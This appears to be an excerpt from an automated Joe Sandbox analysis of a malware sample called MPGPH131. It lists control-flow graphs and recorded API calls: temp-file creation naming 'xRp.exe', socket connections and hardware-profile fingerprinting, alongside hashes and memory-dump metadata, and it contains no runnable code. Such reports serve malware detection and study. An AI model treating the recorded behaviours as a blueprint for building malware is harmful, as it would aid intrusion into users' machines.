24326 b99f5f RtlAllocateHeap __dosmaperr 24320->24326 24321->24320 24323 ba3b76 RtlAllocateHeap 24321->24323 24323->24321 24324 ba3b89 24323->24324 24324->24309 24325->24315 24326->24324 24655 ab2540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor 24638 ac9bc0 7 API calls 3 library calls 24656 ac4540 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 24343 b95e56 24344 b95e69 ___std_exception_copy 24343->24344 24349 b95bad 24344->24349 24346 b95e7e 24356 b911fc RtlAllocateHeap ___std_exception_copy 24346->24356 24348 b95e8b 24351 b95bb9 std::locale::_Setgloballocale 24349->24351 24350 b95bbf 24366 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24350->24366 24351->24350 24354 b95c02 24351->24354 24353 b95bda 24353->24346 24357 b95d30 24354->24357 24356->24348 24358 b95d43 24357->24358 24359 b95d56 24357->24359 24358->24353 24367 b95c57 24359->24367 24361 b95d79 24365 b95e07 24361->24365 24371 b922f1 24361->24371 24365->24353 24366->24353 24368 b95cc0 24367->24368 24369 b95c68 24367->24369 24368->24361 24369->24368 24380 b9ae5d SetFilePointerEx RtlAllocateHeap ___std_exception_copy 24369->24380 24372 b9230a 24371->24372 24376 b92331 24371->24376 24372->24376 24381 ba2ca2 24372->24381 24374 b92326 24388 ba20ab 24374->24388 24377 b9ae9d 24376->24377 24432 b9ad7c 24377->24432 24379 b9aeb6 24379->24365 24380->24368 24382 ba2cae 24381->24382 24383 ba2cc3 24381->24383 24395 b99f5f RtlAllocateHeap __dosmaperr 24382->24395 24383->24374 24385 ba2cb3 24396 b914c0 RtlAllocateHeap ___std_exception_copy 24385->24396 24387 ba2cbe 24387->24374 24390 ba20b7 std::locale::_Setgloballocale 24388->24390 24389 ba20bf 24389->24376 24390->24389 24391 ba20f8 24390->24391 24393 ba213e 24390->24393 24411 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24391->24411 24393->24389 24397 ba21bc 24393->24397 24395->24385 24396->24387 24398 ba21e4 24397->24398 24410 ba2207 24397->24410 24399 ba21e8 24398->24399 24401 ba2243 24398->24401 24417 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24399->24417 24402 ba2261 24401->24402 24403 b9ae9d 2 API calls 24401->24403 24412 ba1d01 24402->24412 24403->24402 24406 ba2279 24406->24410 24418 ba18d2 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 24406->24418 24407 ba22c0 24408 ba2329 WriteFile 24407->24408 24407->24410 24408->24410 24410->24389 24411->24389 24419 bada74 24412->24419 24414 ba1d13 24416 ba1d41 24414->24416 24428 b96a30 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 24414->24428 24416->24406 24416->24407 24417->24410 24418->24410 24420 bada8e 24419->24420 24421 bada81 24419->24421 24424 bada9a 24420->24424 24430 b99f5f RtlAllocateHeap __dosmaperr 24420->24430 24429 b99f5f RtlAllocateHeap __dosmaperr 24421->24429 24423 bada86 24423->24414 24424->24414 24426 badabb 24431 b914c0 RtlAllocateHeap ___std_exception_copy 24426->24431 24428->24416 24429->24423 24430->24426 24431->24423 24437 ba7400 24432->24437 24434 b9ad8e 24435 b9adaa SetFilePointerEx 24434->24435 24436 b9ad96 24434->24436 24435->24436 24436->24379 24438 ba740d 24437->24438 24439 ba7422 24437->24439 24450 b99f4c RtlAllocateHeap __dosmaperr 24438->24450 24445 ba7447 24439->24445 24452 b99f4c RtlAllocateHeap __dosmaperr 24439->24452 24442 ba7412 24451 b99f5f RtlAllocateHeap __dosmaperr 24442->24451 24443 ba7452 24453 b99f5f RtlAllocateHeap __dosmaperr 24443->24453 24445->24434 24447 ba741a 24447->24434 24448 ba745a 24454 b914c0 RtlAllocateHeap ___std_exception_copy 24448->24454 24450->24442 24451->24447 24452->24443 24453->24448 24454->24447 24570 4fb0a09 24571 4fb0a10 GetCurrentHwProfileW 24570->24571 24572 4fb0a26 24571->24572 24658 4fb0707 GetCurrentHwProfileW

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 1050044-1050074 GetPEB 1 1050077-105009a 0->1 2 105009d-10500a0 1->2 3 10500a6-10500bc 2->3 4 10501ee-105022b GetTempPathA CreateFileA 2->4 5 1050110-1050116 3->5 6 10500be-10500c5 3->6 12 1050265-1050269 4->12 13 105022d-1050230 4->13 9 1050129-105012f 5->9 10 1050118-105011f 5->10 6->5 7 10500c7-10500ce 6->7 7->5 11 10500d0-10500d7 7->11 15 1050131-1050138 9->15 16 1050148-105014e 9->16 10->9 14 1050121-1050124 10->14 11->5 19 10500d9-10500dd 11->19 20 1050232-1050238 13->20 21 10501bb-10501c0 14->21 15->16 22 105013a-1050141 15->22 17 1050167-105016f 16->17 18 1050150-1050157 16->18 26 1050171-1050178 17->26 27 1050188-105018e 17->27 18->17 25 1050159-1050160 18->25 19->5 28 10500df-10500e3 19->28 29 1050246-1050251 20->29 30 105023a-1050242 20->30 23 10501e0-10501e9 21->23 24 10501c2-10501c5 21->24 22->16 31 1050143-1050146 22->31 23->2 24->23 32 10501c7-10501ca 24->32 25->17 33 1050162-1050165 25->33 26->27 34 105017a-1050181 26->34 36 10501a7-10501ad 27->36 37 1050190-1050197 27->37 28->21 35 10500e9-105010b 28->35 39 1050255-1050261 29->39 30->20 38 1050244 30->38 31->21 32->23 40 10501cc-10501cf 32->40 33->21 34->27 41 1050183-1050186 34->41 35->1 36->21 43 10501af-10501b6 36->43 37->36 42 1050199-10501a0 37->42 38->39 39->12 40->23 44 10501d1-10501d4 40->44 41->21 42->36 46 10501a2-10501a5 42->46 43->21 47 10501b8 43->47 44->23 49 10501d6-10501d9 44->49 46->21 47->21 49->23 50 10501db-10501de 49->50 50->4 50->23
                                      APIs
                                      • GetTempPathA.KERNELBASE(00000104,?), ref: 010501FA
                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01050223
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFilePathTemp
                                      • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
                                      • API String ID: 1031868398-2378254480
                                      • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction ID: 53613071c213fd2b033819c0513f2790d4aa171d1789a8e0a9f3f1142b7a72cc
                                      • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction Fuzzy Hash: 91616174D01215DFCFA5CF98C984AAEFBB4BF44315F14C1AAE98567205C3709A81CF9A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 51 acd620-acd652 WSAStartup 52 acd658-acd682 call ab7d20 * 2 51->52 53 acd726-acd72f 51->53 58 acd68e-acd6d4 52->58 59 acd684-acd688 52->59 61 acd6d6-acd6dc 58->61 62 acd720 58->62 59->53 59->58 63 acd6de 61->63 64 acd734-acd73e 61->64 62->53 65 acd6e4-acd6f8 socket 63->65 64->62 68 acd740-acd748 64->68 65->62 67 acd6fa-acd70a connect 65->67 69 acd70c-acd714 closesocket 67->69 70 acd730 67->70 69->65 71 acd716-acd71f 69->71 70->64 71->62
                                      APIs
                                      • WSAStartup.WS2_32 ref: 00ACD64B
                                      • socket.WS2_32(?,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD6ED
                                      • connect.WS2_32(00000000,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD702
                                      • closesocket.WS2_32(00000000), ref: 00ACD70D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupclosesocketconnectsocket
                                      • String ID:
                                      • API String ID: 3098855095-0
                                      • Opcode ID: 0b4178e9c5868c70a862bd38ffbf1d8ebbcd5e27c37184af38d449ce4e7ccf89
                                      • Instruction ID: 28645df7ffd7bcea01bdd4f1a5dc622f69d57e53b5ca76df51b78bee9027900a
                                      • Opcode Fuzzy Hash: 0b4178e9c5868c70a862bd38ffbf1d8ebbcd5e27c37184af38d449ce4e7ccf89
                                      • Instruction Fuzzy Hash: A431C1726053509BD7209F28CC84B6FB7E5FFC5364F111F2EF9A8A3290E770990486A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 73 4fb0942-4fb0a03 83 4fb0a10-4fb0a19 GetCurrentHwProfileW 73->83 84 4fb0a26-4fb0b86 call 4fb0b90 83->84 100 4fb0b88-4fb0b98 84->100 101 4fb0bb3-4fb0bb9 84->101 102 4fb0ba9-4fb0bae 100->102 103 4fb0bbb-4fb0bbd 101->103 104 4fb0b9a-4fb0ba8 101->104 105 4fb0bbf-4fb0c6a call 4fb0c23 102->105 103->105 104->102 115 4fb0c6b-4fb0cde 105->115 121 4fb0ce0 115->121 121->121
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: 0f20209f6f0e855f153ea3b5c0974aaa59269531070be3a95138e33f98cf0588
                                      • Instruction ID: bead6a5da0ef90b4dcf7c32b11b4c05a6508fce9a27a89a9a9adcc6aa91c2f2a
                                      • Opcode Fuzzy Hash: 0f20209f6f0e855f153ea3b5c0974aaa59269531070be3a95138e33f98cf0588
                                      • Instruction Fuzzy Hash: 0851AFEB74C2657DB20281922F64EF7676DE6C7730730C86BF883C6506EB845E4A21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 122 4fb0951-4fb0a03 133 4fb0a10-4fb0a19 GetCurrentHwProfileW 122->133 134 4fb0a26-4fb0b86 call 4fb0b90 133->134 150 4fb0b88-4fb0b98 134->150 151 4fb0bb3-4fb0bb9 134->151 152 4fb0ba9-4fb0bae 150->152 153 4fb0bbb-4fb0bbd 151->153 154 4fb0b9a-4fb0ba8 151->154 155 4fb0bbf-4fb0c6a call 4fb0c23 152->155 153->155 154->152 165 4fb0c6b-4fb0cde 155->165 171 4fb0ce0 165->171 171->171
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: cce1e0cd8d70f7604c34fd6457dd18fc3768f6acdfb67b3253728ac0d2218dac
                                      • Instruction ID: 5502d6bb2762a8c14abdb8184a25f6ebedc21314ba75291dcfc37049763cf04f
                                      • Opcode Fuzzy Hash: cce1e0cd8d70f7604c34fd6457dd18fc3768f6acdfb67b3253728ac0d2218dac
                                      • Instruction Fuzzy Hash: E1518DEB34C125BDB10281426F64EF7676DE6C7B30730C86BF847D6506EB945E8A21B2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 4fb0956-4fb0a03 182 4fb0a10-4fb0a19 GetCurrentHwProfileW 172->182 183 4fb0a26-4fb0b86 call 4fb0b90 182->183 199 4fb0b88-4fb0b98 183->199 200 4fb0bb3-4fb0bb9 183->200 201 4fb0ba9-4fb0bae 199->201 202 4fb0bbb-4fb0bbd 200->202 203 4fb0b9a-4fb0ba8 200->203 204 4fb0bbf-4fb0c6a call 4fb0c23 201->204 202->204 203->201 214 4fb0c6b-4fb0cde 204->214 220 4fb0ce0 214->220 220->220
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: ac3cb99c1c25c34f180a4f88e2ce3cb03c7810481f7940d7b6456f4d4199ba66
                                      • Instruction ID: 34d0c624ac5144e275b27ce51c6971f1d7d9b8fea5e36947f9e40c257822c5b7
                                      • Opcode Fuzzy Hash: ac3cb99c1c25c34f180a4f88e2ce3cb03c7810481f7940d7b6456f4d4199ba66
                                      • Instruction Fuzzy Hash: 84519EEB34C125BDB50281426F64EF7676DE6C7B30730C86BF887D6506EB941E8A21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 221 4fb09c5-4fb09cc 222 4fb09ce 221->222 223 4fb09d3-4fb0a03 221->223 222->223 227 4fb0a10-4fb0a19 GetCurrentHwProfileW 223->227 228 4fb0a26-4fb0b86 call 4fb0b90 227->228 244 4fb0b88-4fb0b98 228->244 245 4fb0bb3-4fb0bb9 228->245 246 4fb0ba9-4fb0bae 244->246 247 4fb0bbb-4fb0bbd 245->247 248 4fb0b9a-4fb0ba8 245->248 249 4fb0bbf-4fb0c6a call 4fb0c23 246->249 247->249 248->246 259 4fb0c6b-4fb0cde 249->259 265 4fb0ce0 259->265 265->265
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: f4b2ac4bf61ff6ed9ef1f37d1a0f6e0615e0a402b121ad6af93c8140a79e9ffa
                                      • Instruction ID: 18ca0377ecb66ae9c9ff483222355850514b7d369014164fb23d26fa68acdaae
                                      • Opcode Fuzzy Hash: f4b2ac4bf61ff6ed9ef1f37d1a0f6e0615e0a402b121ad6af93c8140a79e9ffa
                                      • Instruction Fuzzy Hash: 8441BFEB34C1257DB10291866F64EF7676DE6C7B30330C86BF887D6506EA841E4B21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 266 4fb09ac-4fb0a03 272 4fb0a10-4fb0a19 GetCurrentHwProfileW 266->272 273 4fb0a26-4fb0b86 call 4fb0b90 272->273 289 4fb0b88-4fb0b98 273->289 290 4fb0bb3-4fb0bb9 273->290 291 4fb0ba9-4fb0bae 289->291 292 4fb0bbb-4fb0bbd 290->292 293 4fb0b9a-4fb0ba8 290->293 294 4fb0bbf-4fb0c6a call 4fb0c23 291->294 292->294 293->291 304 4fb0c6b-4fb0cde 294->304 310 4fb0ce0 304->310 310->310
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: cc0442a4bb8cef9e8c43a2beded40ec2c357d3b1d7735b0a6c0aa0a89d717094
                                      • Instruction ID: 2f9c8fa866eeabd106aab222541317c5d0ab0982b03fd98c686b576b9648534f
                                      • Opcode Fuzzy Hash: cc0442a4bb8cef9e8c43a2beded40ec2c357d3b1d7735b0a6c0aa0a89d717094
                                      • Instruction Fuzzy Hash: E241B0EB34C211BDB20281866F54EF7676DE7C7B30730C86BF487D6506EA941E4A21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 311 4fb0a20-4fb0b86 call 4fb0b90 328 4fb0b88-4fb0b98 311->328 329 4fb0bb3-4fb0bb9 311->329 330 4fb0ba9-4fb0bae 328->330 331 4fb0bbb-4fb0bbd 329->331 332 4fb0b9a-4fb0ba8 329->332 333 4fb0bbf-4fb0c6a call 4fb0c23 330->333 331->333 332->330 343 4fb0c6b-4fb0cde 333->343 349 4fb0ce0 343->349 349->349
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: 15ad104bcc1192f99f71a029841b06042c54f73e8f4d3612d94b80b058d09775
                                      • Instruction ID: 3741eff29ea083e9de337f884022e111c5c04f32a96efc956fb0314cc7668962
                                      • Opcode Fuzzy Hash: 15ad104bcc1192f99f71a029841b06042c54f73e8f4d3612d94b80b058d09775
                                      • Instruction Fuzzy Hash: 2A41DFEB34C165BDB50281926F64EF7676DE7C7B30330C86BF483D6506EA841A8B61B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 350 4fb09d9-4fb0a03 354 4fb0a10-4fb0a19 GetCurrentHwProfileW 350->354 355 4fb0a26-4fb0b86 call 4fb0b90 354->355 371 4fb0b88-4fb0b98 355->371 372 4fb0bb3-4fb0bb9 355->372 373 4fb0ba9-4fb0bae 371->373 374 4fb0bbb-4fb0bbd 372->374 375 4fb0b9a-4fb0ba8 372->375 376 4fb0bbf-4fb0c6a call 4fb0c23 373->376 374->376 375->373 386 4fb0c6b-4fb0cde 376->386 392 4fb0ce0 386->392 392->392
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: 1252261ede54bf865003fe5c68742ba1e3075dc0decfeb3c9b214434a9f84649
                                      • Instruction ID: 4d34759c70ebc66ac76c482b8a3a46b5e48f869b404e6eda738c6ab71b00e69b
                                      • Opcode Fuzzy Hash: 1252261ede54bf865003fe5c68742ba1e3075dc0decfeb3c9b214434a9f84649
                                      • Instruction Fuzzy Hash: 0241AFEB34C1217DB10291826F54EF7676DE6C7B30330C86BF847D6506EA941E4A21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 393 4fb0a09-4fb0a19 GetCurrentHwProfileW 395 4fb0a26-4fb0b86 call 4fb0b90 393->395 411 4fb0b88-4fb0b98 395->411 412 4fb0bb3-4fb0bb9 395->412 413 4fb0ba9-4fb0bae 411->413 414 4fb0bbb-4fb0bbd 412->414 415 4fb0b9a-4fb0ba8 412->415 416 4fb0bbf-4fb0c6a call 4fb0c23 413->416 414->416 415->413 426 4fb0c6b-4fb0cde 416->426 432 4fb0ce0 426->432 432->432
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: c3G&
                                      • API String ID: 2104809126-1137672199
                                      • Opcode ID: 6a7269ded5aceaadbfb0823be25c111b5245b656438941f4c99e523237a109c7
                                      • Instruction ID: f30ceea9eca53901193f52f4dd3e265c7995455c951153fda4c03570c201903a
                                      • Opcode Fuzzy Hash: 6a7269ded5aceaadbfb0823be25c111b5245b656438941f4c99e523237a109c7
                                      • Instruction Fuzzy Hash: B341BEEB34C211BDB10291826F54EF7676DE7C7B30730C86BF483D6506FA841A4A21B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 433 ba21bc-ba21de 434 ba23d1 433->434 435 ba21e4-ba21e6 433->435 436 ba23d3-ba23d7 434->436 437 ba21e8-ba2207 call b91443 435->437 438 ba2212-ba2235 435->438 444 ba220a-ba220d 437->444 439 ba223b-ba2241 438->439 440 ba2237-ba2239 438->440 439->437 442 ba2243-ba2254 439->442 440->439 440->442 445 ba2256-ba2264 call b9ae9d 442->445 446 ba2267-ba2277 call ba1d01 442->446 444->436 445->446 451 ba2279-ba227f 446->451 452 ba22c0-ba22d2 446->452 455 ba22a8-ba22be call ba18d2 451->455 456 ba2281-ba2284 451->456 453 ba2329-ba2349 WriteFile 452->453 454 ba22d4-ba22da 452->454 457 ba234b-ba2351 453->457 458 ba2354 453->458 460 ba22dc-ba22df 454->460 461 ba2315-ba2327 call ba1d7e 454->461 474 ba22a1-ba22a3 455->474 462 ba228f-ba229e call ba1c99 456->462 463 ba2286-ba2289 456->463 457->458 466 ba2357-ba2362 458->466 467 ba2301-ba2313 call ba1f42 460->467 468 ba22e1-ba22e4 460->468 480 ba22fc-ba22ff 461->480 462->474 463->462 469 ba2369-ba236c 463->469 475 ba23cc-ba23cf 466->475 476 ba2364-ba2367 466->476 467->480 477 ba22ea-ba22f7 call ba1e59 468->477 478 ba236f-ba2371 468->478 469->478 474->466 475->436 476->469 477->480 482 ba239f-ba23ab 478->482 483 ba2373-ba2378 478->483 480->474 485 ba23ad-ba23b3 482->485 486 ba23b5-ba23c7 482->486 487 ba237a-ba238c 483->487 488 ba2391-ba239a call b99f28 483->488 485->434 485->486 486->444 487->444 488->444
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000000,00B95DA7,?,00000000,00000000,00000000,?,00000000,?,00B8B2D2,00B95DA7,00000000,00B8B2D2,?,?), ref: 00BA2341
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 6fc7e7908de09dabe606cdde77601756e169ed4890d95618fee47bee930dd994
                                      • Instruction ID: 26ca05f0ad1c005d9d0e1c6779ddad7ea970ce5c88fdcf34972302ad3d801a49
                                      • Opcode Fuzzy Hash: 6fc7e7908de09dabe606cdde77601756e169ed4890d95618fee47bee930dd994
                                      • Instruction Fuzzy Hash: E061BE71808259AEDF15CFACC880AEEBBF9EF0B304F1405D5E900AB216D776D9018BA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
